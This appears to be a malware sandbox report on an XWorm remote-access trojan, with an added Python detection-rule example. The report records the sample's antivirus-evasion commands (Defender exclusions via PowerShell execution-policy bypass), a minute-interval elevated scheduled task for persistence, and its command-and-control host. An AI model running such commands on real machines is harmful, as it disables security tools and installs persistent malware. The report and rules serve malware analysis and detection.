            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PjGz899RZV.exe Memory allocated: 610000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\PjGz899RZV.exe Memory allocated: 1A390000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe Memory allocated: 2E80000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe Memory allocated: 1B090000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe Memory allocated: 28B0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe Memory allocated: 1AB90000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe Memory allocated: F10000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe Memory allocated: 1AC90000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe Memory allocated: 26B0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe Memory allocated: 1A8A0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\PjGz899RZV.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\PjGz899RZV.exe Window / User API: threadDelayed 2600
            Source: C:\Users\user\Desktop\PjGz899RZV.exe Window / User API: threadDelayed 7181
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5093
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4707
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6285
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3410
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6713
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2926
            Source: C:\Users\user\Desktop\PjGz899RZV.exe TID: 1540 Thread sleep time: -28592453314249787s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6368 Thread sleep time: -7378697629483816s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828 Thread sleep count: 6285 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828 Thread sleep count: 3410 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5708 Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3460 Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe TID: 2536 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe TID: 3040 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe TID: 716 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\PjGz899RZV.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\PjGz899RZV.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe Thread delayed: delay time: 922337203685477
            Source: PjGz899RZV.exe, 00000000.00000002.3418645293.000000001AF90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: PjGz899RZV.exe, 00000000.00000002.3418645293.000000001AFE5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\PjGz899RZV.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\PjGz899RZV.exe Process token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\PjGz899RZV.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\PjGz899RZV.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe'
            Source: C:\Users\user\Desktop\PjGz899RZV.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\PjGz899RZV.exe'
            Source: C:\Users\user\Desktop\PjGz899RZV.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PjGz899RZV.exe'
            Source: C:\Users\user\Desktop\PjGz899RZV.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PjGz899RZV" /tr "C:\Users\user\AppData\Roaming\PjGz899RZV.exe"
            Source: PjGz899RZV.exe, 00000000.00000002.3393220395.0000000002391000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: PjGz899RZV.exe, 00000000.00000002.3393220395.0000000002391000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
            Source: PjGz899RZV.exe, 00000000.00000002.3393220395.0000000002391000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: PjGz899RZV.exe, 00000000.00000002.3393220395.0000000002391000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
            Source: PjGz899RZV.exe, 00000000.00000002.3393220395.0000000002391000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager2
            Source: C:\Users\user\Desktop\PjGz899RZV.exe | Queries volume information: C:\Users\user\Desktop\PjGz899RZV.exe VolumeInformation
            Source: C:\Users\user\Desktop\PjGz899RZV.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information (the following sequence is recorded three times, once per powershell.exe instance; repeated entries within a sequence are collapsed):
              C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              C:\ VolumeInformation
              C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Queries volume information: C:\Users\user\AppData\Roaming\PjGz899RZV.exe VolumeInformation (recorded 4 times)
            Source: C:\Users\user\Desktop\PjGz899RZV.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: PjGz899RZV.exe, 00000000.00000002.3418645293.000000001B018000.00000004.00000020.00020000.00000000.sdmp, PjGz899RZV.exe, 00000000.00000002.3418645293.000000001B051000.00000004.00000020.00020000.00000000.sdmp, PjGz899RZV.exe, 00000000.00000002.3385846383.00000000006AC000.00000004.00000020.00020000.00000000.sdmp, PjGz899RZV.exe, 00000000.00000002.3385846383.0000000000636000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\PjGz899RZV.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct (recorded 4 times)
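            The process-creation evidence above (PowerShell Add-MpPreference exclusions launched with -ExecutionPolicy Bypass, then a schtasks.exe task that re-launches the AppData\Roaming copy every minute at run level HIGHEST) and the root\SecurityCenter2 AntivirusProduct WMI queries are exactly the records a detection rule is written against. The Python below is an added example, not part of the Joe Sandbox report or of the XWorm sample: it runs a few rules over process-creation and WMI-query records constructed from the command lines in this report (the ProcEvent schema and its field names are this example's own assumption, not a Sysmon or Joe Sandbox format) and correlates a Defender exclusion with a minute-interval task from the same parent process into one composite finding. A single exclusion on its own is routine administration; the combination of a bypass flag, a user-writable target, /sc minute /mo 1 and /RL HIGHEST from one parent is the part worth alerting on.

```python
"""Rules for the Defender-exclusion + minute-interval-task chain seen in this report.
The event schema here is this example's own, not a Sysmon or Joe Sandbox format."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation or WMI-query record (assumed schema)."""
    parent_image: str
    image: str
    cmdline: str = ""
    wmi_query: str = ""


# PowerShell parameter names and schtasks switches are case-insensitive, hence re.I.
EXCLUSION_RE = re.compile(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)\s+'([^']+)'", re.I)
BYPASS_RE = re.compile(r"-(?:ExecutionPolicy|ep|ex)\s+Bypass", re.I)
MINUTE_TRIGGER_RE = re.compile(r"/sc\s+minute\s+/mo\s+(\d+)", re.I)
TASK_ACTION_RE = re.compile(r'/tr\s+(?:"([^"]+)"|(\S+))', re.I)
HIGHEST_RL_RE = re.compile(r"/RL\s+HIGHEST", re.I)
USER_WRITABLE_RE = re.compile(r"\\Users\\[^\\]+\\(AppData|Desktop|Downloads)\\", re.I)
AV_ENUM_RE = re.compile(r"root\\SecurityCenter2\s*:\s*Select\s+\*\s+from\s+AntivirusProduct", re.I)


def check_event(ev):
    """Return a list of (rule, severity, detail) findings for one record."""
    findings = []
    image = ev.image.lower()
    if image.endswith("\\powershell.exe"):
        m = EXCLUSION_RE.search(ev.cmdline)
        if m:
            kind, target = m.group(1), m.group(2)
            # A process-name exclusion, a user-writable target or an execution-policy
            # bypass on the same command line each raise the finding to high.
            suspicious = kind == "Process" or USER_WRITABLE_RE.search(target) or BYPASS_RE.search(ev.cmdline)
            findings.append(("defender_exclusion_added", "high" if suspicious else "medium", f"{kind}={target}"))
    elif image.endswith("\\schtasks.exe") and "/create" in ev.cmdline.lower():
        trig = MINUTE_TRIGGER_RE.search(ev.cmdline)
        act = TASK_ACTION_RE.search(ev.cmdline)
        target = (act.group(1) or act.group(2)) if act else ""
        # A task firing every few minutes from a user-writable path is a respawn /
        # watchdog pattern; /RL HIGHEST additionally requests an elevated token.
        if trig and int(trig.group(1)) <= 5 and USER_WRITABLE_RE.search(target):
            sev = "high" if HIGHEST_RL_RE.search(ev.cmdline) else "medium"
            findings.append(("schtasks_minute_persistence", sev, f"every {trig.group(1)} min -> {target}"))
    if ev.wmi_query and AV_ENUM_RE.search(ev.wmi_query):
        findings.append(("av_product_enumeration", "low", "root\\SecurityCenter2 AntivirusProduct"))
    return findings


def scan(events):
    """Scan all records; add one composite finding per parent that both adds a
    Defender exclusion and registers a minute-interval task (the chain in this report)."""
    results, rules_by_parent = [], {}
    for ev in events:
        for rule, sev, detail in check_event(ev):
            results.append({"parent": ev.parent_image, "rule": rule, "severity": sev, "detail": detail})
            rules_by_parent.setdefault(ev.parent_image, set()).add(rule)
    for parent, rules in rules_by_parent.items():
        if {"defender_exclusion_added", "schtasks_minute_persistence"} <= rules:
            results.append({"parent": parent, "rule": "evasion_plus_persistence_chain",
                            "severity": "critical", "detail": ", ".join(sorted(rules))})
    return results


# Constructed records: the first five command lines are taken from the report; the last
# one is a constructed lower-severity control (no bypass flag, target outside user dirs).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS = r"C:\Windows\System32\schtasks.exe"
SAMPLE = r"C:\Users\user\Desktop\PjGz899RZV.exe"
ROAMING = r"C:\Users\user\AppData\Roaming\PjGz899RZV.exe"
SAMPLE_EVENTS = [
    ProcEvent(SAMPLE, PS, f'"{PS}" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath \'{SAMPLE}\''),
    ProcEvent(SAMPLE, PS, f'"{PS}" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath \'{ROAMING}\''),
    ProcEvent(SAMPLE, PS, f'"{PS}" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess \'PjGz899RZV.exe\''),
    ProcEvent(SAMPLE, SCHTASKS, f'"{SCHTASKS}" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PjGz899RZV" /tr "{ROAMING}"'),
    ProcEvent(SAMPLE, SAMPLE, wmi_query=r"IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct"),
    ProcEvent(r"C:\Windows\explorer.exe", PS, f'"{PS}" Add-MpPreference -ExclusionPath \'C:\\Build\\cache\''),
]

if __name__ == "__main__":
    for r in scan(SAMPLE_EVENTS):
        print(f"[{r['severity']:8}] {r['rule']:32} {r['detail']}")
```

            On a live host the same rules would be fed from Sysmon event 1 or Security 4688 command lines plus WMI activity logging. The regex accepts the abbreviated -ep and -ex spellings of -ExecutionPolicy, but it does not decode base64 -EncodedCommand payloads; a production rule needs that decoding step in front of it, since the same Add-MpPreference call is frequently delivered encoded.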

            Stealing of Sensitive Information

            Source: Yara match | File source: PjGz899RZV.exe, type: SAMPLE
            Source: Yara match | File source: 0.0.PjGz899RZV.exe.e0000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000000.00000000.2129079448.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: PjGz899RZV.exe PID: 4236, type: MEMORYSTR
            Source: Yara match | File source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe, type: DROPPED

            Remote Access Functionality

            Source: Yara match | File source: PjGz899RZV.exe, type: SAMPLE
            Source: Yara match | File source: 0.0.PjGz899RZV.exe.e0000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000000.00000000.2129079448.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: PjGz899RZV.exe PID: 4236, type: MEMORYSTR
            Source: Yara match | File source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe, type: DROPPED
            MITRE ATT&CK matrix. Only techniques with matched signatures are listed; the number in parentheses reproduces the signature-count badge(s) shown in the matrix cell.
            Execution: Windows Management Instrumentation (1), Scheduled Task/Job (1), PowerShell (1)
            Persistence: Scheduled Task/Job (1), Registry Run Keys / Startup Folder (21), DLL Side-Loading (1)
            Privilege Escalation: Process Injection (12), Scheduled Task/Job (1), Registry Run Keys / Startup Folder (21), DLL Side-Loading (1)
            Defense Evasion: Masquerading (1), Disable or Modify Tools (11), Virtualization/Sandbox Evasion (31), Process Injection (12), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (1), Software Packing (2), DLL Side-Loading (1)
            Credential Access: Input Capture (1)
            Discovery: Security Software Discovery (121), Process Discovery (2), Virtualization/Sandbox Evasion (31), Application Window Discovery (1), File and Directory Discovery (1), System Information Discovery (13)
            Collection: Input Capture (1), Archive Collected Data (11)
            Command and Control: Encrypted Channel (1), Non-Standard Port (1), Non-Application Layer Protocol (1), Application Layer Protocol (11)
            Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration, Impact: no matched techniques
            Behavior graph (ID 1579065, sample PjGz899RZV.exe, start date 20/12/2024, architecture WINDOWS, score 100), rendered as text:
            Start node: resolves below-communist.gl.at.ply.gg. Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures. Starts PjGz899RZV.exe (node 8, graph counters 1 8), PjGz899RZV.exe (node 13), PjGz899RZV.exe (node 15) and 2 other processes.
            PjGz899RZV.exe (node 8): connects to below-communist.gl.at.ply.gg 147.185.221.24 (ports 38116, 49801, 49858; SALSGIVERUS, United States). Drops C:\Users\user\AppData\...\PjGz899RZV.exe (PE32). Signatures: Protects its processes via BreakOnTermination flag; Bypasses PowerShell execution policy; Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender. Starts powershell.exe (nodes 19, 22, 24; graph counter 23 each) and schtasks.exe (node 26, graph counter 1).
            PjGz899RZV.exe (node 13): drops C:\Users\user\AppData\...\PjGz899RZV.exe.log (CSV). Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file.
            powershell.exe (node 19): signature Loading BitLocker PowerShell Module; starts conhost.exe (node 28). powershell.exe (node 22) starts conhost.exe (node 30); powershell.exe (node 24) starts conhost.exe (node 32); schtasks.exe (node 26) starts conhost.exe (node 34).

            Antivirus, machine learning and genetic malware detection
            Initial sample (Source | Detection | Scanner | Label):
            PjGz899RZV.exe | 82% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT
            PjGz899RZV.exe | 100% | Avira | TR/Spy.Gen
            PjGz899RZV.exe | 100% | Joe Sandbox ML
            Dropped files (Source | Detection | Scanner | Label):
            C:\Users\user\AppData\Roaming\PjGz899RZV.exe | 100% | Avira | TR/Spy.Gen
            C:\Users\user\AppData\Roaming\PjGz899RZV.exe | 100% | Joe Sandbox ML
            C:\Users\user\AppData\Roaming\PjGz899RZV.exe | 82% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT
            Unpacked PE files, domains and URLs: No Antivirus matches
            Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
            below-communist.gl.at.ply.gg | 147.185.221.24 | true | true | none listed | unknown
            Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
            below-communist.gl.at.ply.gg | true | none listed | unknown
            URLs found in process memory (Name | Source | Malicious | Reputation). All entries below are marked not malicious with high reputation: they are strings carried by PowerShell, .NET and bundled modules (PackageManagement, Pester) resident in powershell.exe memory, not attacker infrastructure; the only network indicator in this report is the ply.gg host above.
            http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2231159218.000002A2B0160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2316892887.00000204C4A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2456761857.0000016090070000.00000004.00000800.00020000.00000000.sdmp | false | high
            http://crl.m | powershell.exe, 00000005.00000002.2333487305.00000204CD186000.00000004.00000020.00020000.00000000.sdmp | false | high
            http://schemas.mic | powershell.exe, 00000008.00000002.2490281197.00000160F79A0000.00000004.00000020.00020000.00000000.sdmp | false | high
            http://pesterbdd.com/images/Pester.png | powershell.exe, 00000008.00000002.2362621847.0000016080229000.00000004.00000800.00020000.00000000.sdmp | false | high
